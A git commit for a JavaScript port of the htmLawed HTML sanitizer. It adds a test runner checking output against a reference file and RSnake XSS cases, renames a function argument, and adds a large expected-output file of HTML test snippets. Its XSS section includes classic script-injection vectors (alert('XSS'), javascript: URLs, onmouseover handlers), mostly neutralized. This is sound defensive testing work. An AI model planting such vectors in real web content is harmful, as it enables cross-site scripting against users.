add some tests, rename hl_bal function arg
parent
e6d3da4e08
commit
a5778a95c3
|
@ -1,3 +1,24 @@
|
||||||
const fs = require('fs');
|
const fs = require('fs');
|
||||||
const htmLawed = require('./htmLawed.c.js');
|
const htmLawed = require('./htmLawed.c.js');
|
||||||
console.log(htmLawed.sanitize(fs.readFileSync(process.argv[2], { encoding: 'utf8' }), { safe: 1 }));
|
|
||||||
|
var out1 = htmLawed.sanitize(fs.readFileSync('htmLawed_TESTCASE.txt', { encoding: 'utf8' }), { safe: 1, keep_bad: 1 });
|
||||||
|
var check1 = fs.readFileSync('htmLawed_TESTCASE_out.htm', { encoding: 'utf8' });
|
||||||
|
if (out1 == check1)
|
||||||
|
console.log("[TESTCASE.txt] OK");
|
||||||
|
else
|
||||||
|
{
|
||||||
|
console.log("[TESTCASE.txt] NOT OK, see htmLawed_TESTCASE_bad.htm");
|
||||||
|
fs.writeFileSync('htmLawed_TESTCASE_bad.htm', out1, { encoding: 'utf8' });
|
||||||
|
}
|
||||||
|
|
||||||
|
var tests = fs.readFileSync('rsnake_xss.txt', { encoding: 'utf8' });
|
||||||
|
var m;
|
||||||
|
while ((m = /^(\d+)\.\s*([^\n]+)\n\nInput code »\n([\s\S]*?)\n\nOutput code »\n([\s\S]*?)\n\n/.exec(tests)))
|
||||||
|
{
|
||||||
|
var output = htmLawed.sanitize(m[3], { safe: 1, keep_bad: 1 }).trim();
|
||||||
|
if (output === m[4])
|
||||||
|
console.log("["+m[1]+"] "+m[2]+": OK");
|
||||||
|
else
|
||||||
|
console.log("["+m[1]+"] "+m[2]+": NOT OK\n"+m[4]+"\n vs \n"+output);
|
||||||
|
tests = tests.substr(m[0].length);
|
||||||
|
}
|
||||||
|
|
18
htmLawed.js
18
htmLawed.js
|
@ -161,8 +161,8 @@ var htmLawed = module.exports =
|
||||||
t = htmLawed._strtr(t, { "\x01": '', "\x02": '', "\x03": '&', "\x04": '<', "\x05": '>' });
|
t = htmLawed._strtr(t, { "\x01": '', "\x02": '', "\x03": '&', "\x04": '<', "\x05": '>' });
|
||||||
if (C.tidy)
|
if (C.tidy)
|
||||||
t = htmLawed.hl_tidy(t, C.tidy, C.parent);
|
t = htmLawed.hl_tidy(t, C.tidy, C.parent);
|
||||||
return t;
|
|
||||||
// eof
|
// eof
|
||||||
|
return t;
|
||||||
},
|
},
|
||||||
hl_attrval: function(a, t, p)
|
hl_attrval: function(a, t, p)
|
||||||
{
|
{
|
||||||
|
@ -208,10 +208,10 @@ var htmLawed = module.exports =
|
||||||
return (r.length > 0 ? r.join(s) : (p['default'] || 0));
|
return (r.length > 0 ? r.join(s) : (p['default'] || 0));
|
||||||
// eof
|
// eof
|
||||||
},
|
},
|
||||||
hl_bal: function(t, perf, intag)
|
hl_bal: function(t, keep_bad, intag)
|
||||||
{
|
{
|
||||||
if (perf === undefined)
|
if (keep_bad === undefined)
|
||||||
perf = 1;
|
keep_bad = 1;
|
||||||
// balance tags
|
// balance tags
|
||||||
// by content
|
// by content
|
||||||
var cont = {};
|
var cont = {};
|
||||||
|
@ -271,7 +271,7 @@ var htmLawed = module.exports =
|
||||||
// intag sets allowed child
|
// intag sets allowed child
|
||||||
intag = ((el.F[intag] && intag != '#pcdata') || el.O[intag]) ? intag : 'div';
|
intag = ((el.F[intag] && intag != '#pcdata') || el.O[intag]) ? intag : 'div';
|
||||||
if (cont.E[intag])
|
if (cont.E[intag])
|
||||||
return (!perf ? '' : htmLawed.replace(/</g, '<').replace(/>/g, '>'));
|
return (!keep_bad ? '' : htmLawed.replace(/</g, '<').replace(/>/g, '>'));
|
||||||
var inOk = getCont(intag);
|
var inOk = getCont(intag);
|
||||||
var ok = {}, q = [], ql; // q = seq list of open non-empty ele
|
var ok = {}, q = [], ql; // q = seq list of open non-empty ele
|
||||||
var _ob = '';
|
var _ob = '';
|
||||||
|
@ -421,13 +421,13 @@ var htmLawed = module.exports =
|
||||||
delete cont.I['ins'];
|
delete cont.I['ins'];
|
||||||
}
|
}
|
||||||
// bad tags, & ele content
|
// bad tags, & ele content
|
||||||
if (e && (perf == 1 || (ok['#pcdata'] && (perf == 3 || perf == 5))))
|
if (e && (keep_bad == 1 || (ok['#pcdata'] && (keep_bad == 3 || keep_bad == 5))))
|
||||||
_ob += '<'+s+e+a+'>';
|
_ob += '<'+s+e+a+'>';
|
||||||
if (x !== '' && x !== null)
|
if (x !== '' && x !== null)
|
||||||
{
|
{
|
||||||
if (x.trim().length > 0 && ((ql && cont.B[p]) || (cont.B[intag] && !ql))) // FIXME trim
|
if (x.trim().length > 0 && ((ql && cont.B[p]) || (cont.B[intag] && !ql))) // FIXME trim
|
||||||
_ob += '<div>'+x+'</div>';
|
_ob += '<div>'+x+'</div>';
|
||||||
else if (perf < 3 || ok['#pcdata'])
|
else if (keep_bad < 3 || ok['#pcdata'])
|
||||||
_ob += x;
|
_ob += x;
|
||||||
else if (x.indexOf("\x02\x04") >= 0)
|
else if (x.indexOf("\x02\x04") >= 0)
|
||||||
{
|
{
|
||||||
|
@ -435,10 +435,10 @@ var htmLawed = module.exports =
|
||||||
for (var _i = 0; _i < x.length; _i++)
|
for (var _i = 0; _i < x.length; _i++)
|
||||||
{
|
{
|
||||||
var v = x[_i];
|
var v = x[_i];
|
||||||
_ob += v.substr(0, 2) == "\x01\x02" ? v : (perf > 4 ? v.replace(/\S+/g, '') : '');
|
_ob += v.substr(0, 2) == "\x01\x02" ? v : (keep_bad > 4 ? v.replace(/\S+/g, '') : '');
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
else if (perf > 4)
|
else if (keep_bad > 4)
|
||||||
_ob += x.replace(/\S+/g, '');
|
_ob += x.replace(/\S+/g, '');
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
@ -0,0 +1,450 @@
|
||||||
|
/*
|
||||||
|
htmLawed_TESTCASE.txt, 27 February 2016
|
||||||
|
htmLawed 1.1.22, 5 March 2016
|
||||||
|
Copyright Santosh Patnaik
|
||||||
|
Dual licensed with LGPL 3 and GPL 2+
|
||||||
|
A PHP Labware internal utility - http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
|
||||||
|
*/
|
||||||
|
|
||||||
|
This file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.
|
||||||
|
|
||||||
|
************************************************
|
||||||
|
when viewing this file in a web browser, set the
|
||||||
|
character encoding to Unicode/UTF-8
|
||||||
|
************************************************
|
||||||
|
|
||||||
|
--------------------- start --------------------
|
||||||
|
|
||||||
|
<em>Try different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page</em><br />
|
||||||
|
|
||||||
|
<h6>Attributes</h6>
|
||||||
|
|
||||||
|
<strong>Xml:lang:</strong><a lang="en" xml:lang="en"></a>, <a lang="en"></a>, <a xml:lang="en"></a><br />
|
||||||
|
<strong>Standard, predefined value, or empty attribute:</strong> <input type="text" disabled="disabled" />, <input type="text" disabled="disabled" />, <input type="text" disabled="disabled" /><br />
|
||||||
|
<strong>Required:</strong> <img src="src" alt="image" />, <img alt="image" src="src" /><br />
|
||||||
|
<strong>Quote & space variation:</strong> <a id="id1" name="xy">a</a>, <a id="id2" name="xy">a</a>, <a id="id3" name="n">a</a><br />
|
||||||
|
<strong>Invalid:</strong> <a id="id4">a</a><br />
|
||||||
|
<strong>Duplicated:</strong> <a id="id6">a</a><br />
|
||||||
|
<strong>Deprecated:</strong> <a id="id7" target="self" name="n">a</a>, <hr style="border-style: none; border: 0; background-color: gray; color: gray;" /><br />
|
||||||
|
<strong>Casing:</strong> <a href=""></a><br />
|
||||||
|
<strong>Custom:</strong> <img alt="image" src="src" /><br />
|
||||||
|
<strong>Data-*:</strong> <a>a</a><br />
|
||||||
|
<strong>Admin-restricted?:</strong> <a href="x"></a>
|
||||||
|
|
||||||
|
<h6>Attribute values</h6>
|
||||||
|
|
||||||
|
<strong>Duplicate ID value:</strong><a id="id8"></a>, <a id="my_id8"></a>, <a></a><br />
|
||||||
|
(try 'my_' for prefix)<br />
|
||||||
|
<strong>Double-quotes in value:</strong><a title="ab"></a>, <a title="ab"></a>, <a title="ab"c"></a><br />
|
||||||
|
(try filter for CSS expression)<br />
|
||||||
|
<strong>CSS expression</strong>: <div style="prop: ();"></div><div style="prop: ()"></div><div style="prop: ();"></div><div style="prop : ()"></div><div style="prop: (js);"></div><div style="prop: (js;)"></div><div style="prop: ('js');"></div><div style="prop : expr ession('js':)"></div><div style="prop: ( 'js@ );"></div><br />
|
||||||
|
<strong>Other:</strong> <input size="50" class="my" value="an input an input an input" />, <input size="5" class="your" value="an input" /><br />
|
||||||
|
(try 'maxlen', 'maxval', etc., for 'input' in '$spec')
|
||||||
|
|
||||||
|
<h6>Blockquotes</h6>
|
||||||
|
|
||||||
|
<blockquote><div>abc</div></blockquote><br />
|
||||||
|
<blockquote><div>abc<div>def</div></div></blockquote><br />
|
||||||
|
<blockquote><div>abc</div><div>def</div></blockquote><br />
|
||||||
|
<blockquote><div>abc<div>def</div>ghi</div></blockquote><br />
|
||||||
|
abc<div>def</div>ghi<br />
|
||||||
|
<blockquote><div>QQQ<div>x</div><!-- comment --></div></blockquote><br />
|
||||||
|
<blockquote><div>x</div><div><!-- comment -->QQQ</div></blockquote><br />
|
||||||
|
<blockquote><div><!-- comment --><div>x</div>QQQ<div>x</div></div></blockquote><br />
|
||||||
|
<blockquote><div>x<!-- comment --></div><div>QQQ</div></blockquote><p>x</p><br />
|
||||||
|
<br />
|
||||||
|
(try with blockquote parent)
|
||||||
|
|
||||||
|
<h6>CDATA sections</h6>
|
||||||
|
|
||||||
|
<strong>Special characters inside:</strong> <![CDATA[ ]]> ]]>, <![CDATA[ 3 < 4 > 3.5, & 4 > 4 ]]><br />
|
||||||
|
<strong>Normal:</strong> <![CDATA[ check ]]>, <em>CDATA follows:<![CDATA[ check ]]></em><br />
|
||||||
|
<strong>Malformed:</strong> <![cdata check ]]>, < ![CDATA check ]]>, <![CDATA check ]]>, < ![CDATA check ] ]><br />
|
||||||
|
<strong>Invalid:</strong> <em>>CDATA in tag content</em>, <table><![CDATA[ check ]]><tr><td>text not allowed</td></tr></table>
|
||||||
|
|
||||||
|
<h6>Complex-1: deprecated elements</h6>
|
||||||
|
|
||||||
|
<div style="text-align: center;">
|
||||||
|
The PHP <span style="text-decoration: line-through;">software</span> script used for this <span style="text-decoration: line-through;">web-page</span> webpage is <span style="font-weight: bold; font-size: 200%; color: red; font-family: arial;">htmLawedTest.php</span>, from <span style="color:green; text-decoration: underline;">PHP Labware</span>.
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<h6>Complex-2: deprecated attributes</h6>
|
||||||
|
|
||||||
|
<img src="s" alt="a" id="n" /><img src="s" alt="a" id="id9" />
|
||||||
|
<br style="clear: left;" />
|
||||||
|
<hr style="border-style: none; border: 0; background-color: gray; color: gray; size: 1px;" />
|
||||||
|
<img src="s" alt="image" width="10em" height="20" style="padding:5px; float: left; margin-left: 10px; margin-right: 10px; margin-top: 10px; margin-bottom: 10px; border: 1px;" id="id10" />
|
||||||
|
<table width="50em" style="margin: auto; background-color: red;">
|
||||||
|
<tr>
|
||||||
|
<td style="width: 20%;">
|
||||||
|
<div style="margin: auto;">
|
||||||
|
<h3 style="text-align: right;">Section</h3>
|
||||||
|
<p style="text-align: right;">Para</p>
|
||||||
|
<ol style="list-style-type: lower-latin;"><li><a name="x" id="x">First</a> <a name="x" id="id11">item</a></li></ol>
|
||||||
|
</div>
|
||||||
|
</td>
|
||||||
|
<td style="width: auto;">
|
||||||
|
<ol style="list-style-type: decimal;"><li>First item</li></ol>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
<br style="clear: both;" />
|
||||||
|
|
||||||
|
<h6>Complex-3: embed, object, area</h6>
|
||||||
|
|
||||||
|
<object width="425" height="350"><param name="movie" value="http://www.youtube.com/v/ls7gi1VwdIQ" /></param><embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed></object><br />
|
||||||
|
|
||||||
|
<embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed><br />
|
||||||
|
|
||||||
|
<object data="1.gif" type="image/gif" usemap="#map1"><map name="map1" id="map1">
|
||||||
|
<p>navigate the site: <a href="1" shape="rect" coords="0,0,118,28">1</a> | <a href="3" shape="circle" coords="184,200,60">3</a> | <a href="4" shape="poly" coords="276,0,276,28,100,200,50,50,276,0">4</a></p>
|
||||||
|
<area href="5" shape="rect" coords="0,0,118,28" alt="area" />
|
||||||
|
</map></object>
|
||||||
|
|
||||||
|
<param name="name" />value</param>
|
||||||
|
|
||||||
|
<object id="obj1">
|
||||||
|
<param name="param1" />
|
||||||
|
<object id="obj2">
|
||||||
|
<param name="param2" />
|
||||||
|
</object>
|
||||||
|
</object>
|
||||||
|
|
||||||
|
<h6>Complex-4: nested and other tables</h6>
|
||||||
|
|
||||||
|
<table border="1" style="background-color: red;"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> <table border="1" style="background-color: green;"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table><br />
|
||||||
|
<strong>PCDATA wrong:</strong> <table>Well<caption>Hello</caption></table><br />
|
||||||
|
<strong>Missing tr:</strong> <table><td>Well</td></table><br />
|
||||||
|
|
||||||
|
<h6>Complex-5: pseudo, disallowed or non-HTML tags</h6>
|
||||||
|
|
||||||
|
(Try different 'keep_bad' values)
|
||||||
|
<*> Pseudotags <*>
|
||||||
|
<xml>Non-HTML tag xml</xml>
|
||||||
|
<p>
|
||||||
|
Disallowed tag p
|
||||||
|
</p>
|
||||||
|
<ul>Bad<li>OK</li></ul>
|
||||||
|
|
||||||
|
<h6>Elements</h6>
|
||||||
|
|
||||||
|
<strong>Unbalanced:</strong> <a href="h"><em>check</em></a></em><br />
|
||||||
|
<strong>Non-XHTML:</strong> <div><div style="text-align: center;"><ul></ul></div></div><br />
|
||||||
|
<strong>Malformed:</strong> < a href=""></a>, <a href=""></a>, <a href=""></a>, <a href=""></a>, <a href="">< /a>, < a href=""></a>, <img src="s" alt="a" />, <img src="s" alt="a" />, <imgsrc="s" alt="a" /><br />
|
||||||
|
<strong>Invalid:</strong> <image src="s" alt="a" /><br />
|
||||||
|
<strong>Empty:</strong> <img src="s" alt="a" />, <img src="s" alt="a" /></img>, <img src="s" alt="a" />text</img><br />
|
||||||
|
<strong>Content invalid:</strong> <a href="h">1</a><a>2</a></a><br />
|
||||||
|
<strong>Content invalid?:</strong> <form action="action"></form><br /> (try setting 'form' as parent)<br />
|
||||||
|
<strong>Casing:</strong> <a href=""></a><br />
|
||||||
|
<strong>Check for tidy:</strong> <br /><hr /></div><hr /></div><hr /></div><div>hi</div>
|
||||||
|
|
||||||
|
<h6>Entities</h6>
|
||||||
|
|
||||||
|
<strong>Special:</strong> & 3 < 2 & 5>4 and j >i >a & i<j>a<br />
|
||||||
|
<strong>Padding:</strong> B B f f &#x003; &#0003;<br />
|
||||||
|
<strong>Malformed:</strong> & #x27;, &x27;, ' &TILDE;, &tilde<br />
|
||||||
|
<strong>Invalid:</strong> &#x3;, &#55296;, &#03;, &#1114112;, &#xffff, &bad;<br />
|
||||||
|
<strong>Discouraged characters:</strong> &#x7f;, &#132;, , <br />
|
||||||
|
<strong>Context:</strong> '>', <?<br />
|
||||||
|
<strong>Casing:</strong> ', ', &TILDE;, ˜
|
||||||
|
<br />
|
||||||
|
(also check named-to-numeric and hexdec-to-decimal, and vice versa, conversions)
|
||||||
|
|
||||||
|
<h6>Format</h6>
|
||||||
|
|
||||||
|
<strong>Valid but ill-formatted:</strong> text <!-- comment -->
|
||||||
|
text <!--
|
||||||
|
A c o m m e n t -->
|
||||||
|
<script>
|
||||||
|
<![CDATA[
|
||||||
|
code
|
||||||
|
]]>
|
||||||
|
</script><!-- comment --><![CDATA[ cdata ]]> <a>text</b> text<pre id="none">p r e</pre>
|
||||||
|
<textarea rows="10" cols="50">text</textarea> <textarea rows="10" cols="50">
|
||||||
|
text text
|
||||||
|
</textarea> text text <br /><hr />
|
||||||
|
text <img src="none" alt="none" /> t<em class="none">e<strong>x</strong>t</em>
|
||||||
|
text <img src="none" alt="none" /> <b>t<em> e <strong> x </strong> t</em></b>
|
||||||
|
</a><a href="a"> text <img src="none" alt="none" /> <b>t <em> e <strong> x </strong> t</em></b>
|
||||||
|
</a>
|
||||||
|
<span style="background-color: yellow;">text <img src="none" alt="none" /> <b> <em> t e <strong> x </strong> t</em></b></span>
|
||||||
|
<script>script</script>
|
||||||
|
<div>
|
||||||
|
<pre>p <a>r</a> e <!-- comment --> </pre>
|
||||||
|
<pre>
|
||||||
|
pre
|
||||||
|
</pre>
|
||||||
|
</div>
|
||||||
|
<div><div><table border="1" style="background-color: red;"><tr><td>Cell</td><td colspan="2" rowspan="2"><table border="1" style="background-color: green;"><tr><td>Cell</td><td colspan="2" rowspan="2"></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></div></div>
|
||||||
|
(try to compact or beautify)
|
||||||
|
|
||||||
|
<h6>Forms</h6>
|
||||||
|
|
||||||
|
(note nesting of 'form', missing required attributes, etc.)<br />
|
||||||
|
<form action="action"><div>
|
||||||
|
<script type="text/javascript">s</script>
|
||||||
|
<fieldset><legend>p</legend>l <input name="personal_lastname" type="text" tabindex="1" /></fieldset>
|
||||||
|
<input name="h" type="checkbox" value="h" tabindex="20" /> h
|
||||||
|
<textarea name="t" rows="10" cols="50">t</textarea>
|
||||||
|
</div></form><form action="a" method="get"></form></form><br />
|
||||||
|
<form action="b" method="get"><p><input type="text" value="i" /></p></form><br />
|
||||||
|
<form action="action"><div>B:<input type="text" value="b" />C:<input type="text" value="c" /></div></form><br />
|
||||||
|
(try each of these lines separately)<br />
|
||||||
|
<form action="a"><div>what<br />
|
||||||
|
</div></form><form action="a"><div>what
|
||||||
|
(try with container as div and as form)<br />
|
||||||
|
</div></form><form action="action"><div>c <a>a</a> <b>b</b><input /><script>s</script>
|
||||||
|
|
||||||
|
<h6>HTML comments (also CDATA)</h6>
|
||||||
|
|
||||||
|
<strong>Script inside:</strong> <!--[if gte IE 4]>
|
||||||
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||||||
|
<![endif]--><br />
|
||||||
|
<strong>Special characters inside: <!-- <![CDATA check ]]> -->, <!-- 3 < 4 > 3.5, & 4 > 4 -->, <!-- che--ck -->, <!--[if !IE]> <--><a>c</a><!--> <![endif]--><br />
|
||||||
|
<strong>Normal:</strong> <!-- check -->, <!--check -->, <em>comment:<!-- check --></em><!-- check -->, <table><!-- check --><tr><td>text not allowed</td></tr></table><br />
|
||||||
|
<strong>Malformed:</strong> <![cdata check ]]>, < ![CDATA check ]]>, < ![CDATA check ] ]><br />
|
||||||
|
Invalid:</strong> <em>>comment in tag content</em>, <!--check-->
|
||||||
|
|
||||||
|
<h6>HTML5</h6>
|
||||||
|
|
||||||
|
<strong>figure and figcaption:</strong> <figure><img src="picture.jpg" alt="picture" /><figcaption>Caption for the awesome picture</figcaption></figure>
|
||||||
|
<strong>article:</strong> <h1>A</h1><p>B</p><article><h2>C</h2></article><article><h2>E</h2><p>F</p><p>G</p></article>
|
||||||
|
<strong>meter</strong>: <p>Heat <meter min="100" max="200" value="150">150</meter>.</p>
|
||||||
|
<strong>datalist</strong>: <input /><datalist id="b"><option value="c"><option value="d"></datalist>
|
||||||
|
|
||||||
|
<h6>Ins-Del</h6>
|
||||||
|
|
||||||
|
(depending on context, these elements can be of either block or inline type)<br />
|
||||||
|
<p><ins datetime="d" cite="c"><div>block</ins></p></div></ins></p><div><br />
|
||||||
|
<p><del>d</del></p><br />
|
||||||
|
<p><ins><del>d</del></ins></p><div><ins><p><del><div>d</del></p></ins></div></del></p></ins></div><ins><div>d</div></ins>
|
||||||
|
|
||||||
|
<h6>Lists</h6>
|
||||||
|
|
||||||
|
<div><strong>Invalid character data</strong>: <ul><li>(item</li>)</ul><br />
|
||||||
|
<strong>Definition list</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />
|
||||||
|
<strong>Definition list, close-tags omitted</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />
|
||||||
|
<strong>Definition lists, nested</strong>: <dl>
|
||||||
|
<dt>T1</dt>
|
||||||
|
<dd>D1</dd>
|
||||||
|
<dt>T2</dt>
|
||||||
|
<dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>
|
||||||
|
<dt>T3</dt>
|
||||||
|
<dd>D3</dd>
|
||||||
|
<dt>T4</dt>
|
||||||
|
<dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>
|
||||||
|
</dl><br />
|
||||||
|
<strong>Definition lists, nested, close-tags omitted</strong>: <dl>
|
||||||
|
<dt>T1
|
||||||
|
</dt><dd>D1</dd>
|
||||||
|
<dt>T2</dt>
|
||||||
|
<dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>
|
||||||
|
<dt>T3
|
||||||
|
</dt><dd>D3
|
||||||
|
</dd><dt>T4
|
||||||
|
</dt><dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>
|
||||||
|
</dl><br />
|
||||||
|
<strong>Nested</strong>: <ul>
|
||||||
|
<li>l1</li>
|
||||||
|
<li>l2<ol><li>lo1</li><li>lo2</li></ol></li>
|
||||||
|
<li>l3</li>
|
||||||
|
<li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol></li>
|
||||||
|
</ul><br />
|
||||||
|
<strong>Nested, directly</strong>: <ul>
|
||||||
|
<li>l1</li>
|
||||||
|
<ol>l2</ol>
|
||||||
|
<li>l3</li>
|
||||||
|
</ul><br />
|
||||||
|
<strong>Nested, close-tags omitted</strong>: <ul>
|
||||||
|
<li>l1</li>
|
||||||
|
<li>l2<ol><li>lo1</li><li>lo2</li></ol>
|
||||||
|
</li><li>l3
|
||||||
|
</li><li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol>
|
||||||
|
</li></ul><br />
|
||||||
|
<strong>Complex</strong>:
|
||||||
|
<ol><script></script><li><table><tr><td>
|
||||||
|
<ul><li id="search" class="widget widget_search"> </li></ul></td></tr></table></li></ol></div></form><form id="searchform" method="get" action="http://kohei.us">
|
||||||
|
<div>
|
||||||
|
|
||||||
|
<input type="text" name="s" id="s" size="15" /><br />
|
||||||
|
<input type="submit" value="Search" />
|
||||||
|
</div>
|
||||||
|
</form>
|
||||||
|
</li></ul>
|
||||||
|
</td></tr></table></li></ol>
|
||||||
|
<strong>Menu</strong>: <ul style="list-style-type: decimal;"><li><ul>
|
||||||
|
<button type="button">New...</button>
|
||||||
|
</ul></li><li><ul><button type="button">Cut...</button></ul></li>
|
||||||
|
</ul>
|
||||||
|
|
||||||
|
<h6>Microdata</h6>
|
||||||
|
|
||||||
|
<div>
|
||||||
|
I am <span>X</span> but people call me <span>Y</span>.
|
||||||
|
Find me at <a href="http://www.xy.com">www.xy.com</a>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<h6>Microsoft Word</h6>
|
||||||
|
|
||||||
|
<strong>Proprietary tag</strong>: <p class="3DMsoNormal"><o:p> </o:p></p><br />
|
||||||
|
<strong>XML declaration</strong>: <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><br />
|
||||||
|
<strong>XML-invalid character code-point (may not replicate)</strong>: <p class="3DMsoNormal">“Where is he?” asked both Mary – the one so lovely – and Jane.</p>
|
||||||
|
|
||||||
|
<h6>Nesting</h6>
|
||||||
|
|
||||||
|
<strong>Block or inline a</strong>: <p><a href="link">text</a></p><a href="link"><div>hi</div></a><br />
|
||||||
|
|
||||||
|
<h6>Non-English text-1</h6>
|
||||||
|
|
||||||
|
Inscrieţi-vă acum la a Zecea Conferinţă Internaţională<br />
|
||||||
|
გთხოვთ ახლავე გაიაროთ რეგისტრაცია<br />
|
||||||
|
večjezično računalništvo<br />
|
||||||
|
<a title="อ.อ่าง">อ.อ่าง</a><br />
|
||||||
|
<a title="הירשמו כעת לכנס">Зарегистрируйтесь сейчас
|
||||||
|
на Десятую Международную Конференцию по</a><br />
|
||||||
|
(this file should have utf-8 encoding; some characters may not be displayed because of missing fonts, etc.)
|
||||||
|
|
||||||
|
<h6>Non-English text-2: entities</h6>
|
||||||
|
|
||||||
|
用统一码<br />
|
||||||
|
გთხოვთ<br />
|
||||||
|
Inscreva-se agora para a Décima Conferência Internacional Sobre O Unicode, realizada entre os dias 10 e 12 de março de 1997 em Mainz
|
||||||
|
na Alemanha.
|
||||||
|
|
||||||
|
<h6>Ruby</h6>
|
||||||
|
|
||||||
|
(need compatible browser)<br />
|
||||||
|
<ruby xml:lang="ja">
|
||||||
|
<rbc>
|
||||||
|
<rb>斎</rb>
|
||||||
|
<rb>藤</rb>
|
||||||
|
<rb>信</rb>
|
||||||
|
<rb>男</rb>
|
||||||
|
</rbc>
|
||||||
|
<rtc class="reading">
|
||||||
|
<rt>さい</rt>
|
||||||
|
<rt>とう</rt>
|
||||||
|
<rt>のぶ</rt>
|
||||||
|
<rt>お</rt>
|
||||||
|
</rtc>
|
||||||
|
<rtc class="annotation">
|
||||||
|
<rt xml:lang="en">W3C Associate Chairman</rt>
|
||||||
|
</rtc>
|
||||||
|
</ruby><br />
|
||||||
|
<ruby>
|
||||||
|
<rb>WWW</rb>
|
||||||
|
<rp>(</rp><rt>World Wide Web</rt><rp>)</rp>
|
||||||
|
</ruby><br />
|
||||||
|
<ruby>
|
||||||
|
A
|
||||||
|
<rp>(</rp><rt>aaa</rt><rp>)</rp>
|
||||||
|
</ruby>
|
||||||
|
|
||||||
|
|
||||||
|
<h6>Tables</h6>
|
||||||
|
|
||||||
|
<strong>Omitted closing tags:</strong> <table>
|
||||||
|
<colgroup><col style="x" /><col style="y" />
|
||||||
|
</colgroup><thead>
|
||||||
|
<tr><th>h1c1</th><th>h1c2
|
||||||
|
</th></tr></thead><tbody>
|
||||||
|
<tr><td>r1c1</td><td>r1c2
|
||||||
|
</td></tr><tr><td>r2c1</td><td>r2c2
|
||||||
|
</td></tr></tbody></table><br />
|
||||||
|
<strong>Nested, omitted closing tags:</strong> <table>
|
||||||
|
<colgroup><col style="x" /><col style="y" />
|
||||||
|
</colgroup><thead>
|
||||||
|
<tr><th>h1c1</th><th>h1c2
|
||||||
|
</th></tr></thead><tbody>
|
||||||
|
<tr><td>r1c1</td><td>r1c2<table>
|
||||||
|
<colgroup><col style="x" /><col style="y" />
|
||||||
|
</colgroup><thead>
|
||||||
|
<tr><th>h1c1</th><th>h1c2
|
||||||
|
</th></tr></thead><tbody>
|
||||||
|
<tr><td>r1c1</td><td>r1c2
|
||||||
|
</td></tr><tr><td>r2c1</td><td>r2c2
|
||||||
|
</td></tr></tbody></table>
|
||||||
|
</td></tr><tr><td>r2c1</td><td>r2c2
|
||||||
|
</td></tr></tbody></table><br />
|
||||||
|
|
||||||
|
<h6>Tag transformation</h6>
|
||||||
|
<strong>Font element intended as 'inline' element:</strong> <p><span style="color: red;">hi</span></p><br />
|
||||||
|
<strong>Font element intended as 'block' element:</strong> <div><span style="color: red;"><div>hi</span></div></span></div><br />
|
||||||
|
<strong>Font element intended as 'block' element:</strong> <div style="text-align: center;"><span style="color: red; font-family: serif, 'Times';"><div>hi</span></div><div>QQQ</div></span></div><br />
|
||||||
|
|
||||||
|
<h6>Tidy</h6>
|
||||||
|
<strong>White-space handling:</strong> abc<em> def </em> ghi abc <em>def</em> ghi
|
||||||
|
|
||||||
|
<h6>URLs</h6>
|
||||||
|
|
||||||
|
<strong>Relative and absolute:</strong> <a href="mailto:x"></a>, <a href="http://a.com/b/c/d.f"></a>, <a href="./../d.f"></a>, <a href="./d.f"></a>, <a href="d.f"></a>, <a href="#s"></a>, <a href="./../../d.f#s"></a><br />
|
||||||
|
(try base URL value of 'http://a.com/b/')<br />
|
||||||
|
<strong>CSS URLs:</strong> <div style="background-image: url('denied:a.gif');"></div>, <div style="background-image: URL("denied:a.gif");"></div>, <div style="background-image: url('denied:http://a.com/a.gif');"></div>, <div style="background-image: url('denied:./../a.gif');"></div>, <div style="background-image: url('denied:js:xss')"></div><br />
|
||||||
|
<strong>Double URLs:</strong> <a style="behaviour: url(denied:foo) url(denied:http://example.com/xss.htc)">b</a><br />
|
||||||
|
<strong>Anti-spam:</strong> (try regex for 'http://a.com', etc.) <a href="mailto:x@y.com"></a>, <a href="http://a.com/b@d.f"></a>, <a href="a.com/d.f" rel="nofollow"></a>, <a href="a.com/d.f" rel="1, 2"></a>, <a href="a.com/d.f"></a>, <a href="b.com/d.f"></a>, <a href="c.com/d.f">, </a><a href="denied:http://c.com/d.f"></a><br />
|
||||||
|
<strong>Soft-hyphen:</strong> <a href="http://q=ídis c">ídisc</a>
|
||||||
|
|
||||||
|
<h6>XSS</h6>
|
||||||
|
|
||||||
|
<img alt="<img onmouseover=confirm(1)//" src="src" />
|
||||||
|
'';!--"<xss>=&{()}<br />
|
||||||
|
<img src="denied:javascript%3Aalert('xss');" alt="image" /><br />
|
||||||
|
<img src="denied:javascript:alert('xss');" alt="image" /><br />
|
||||||
|
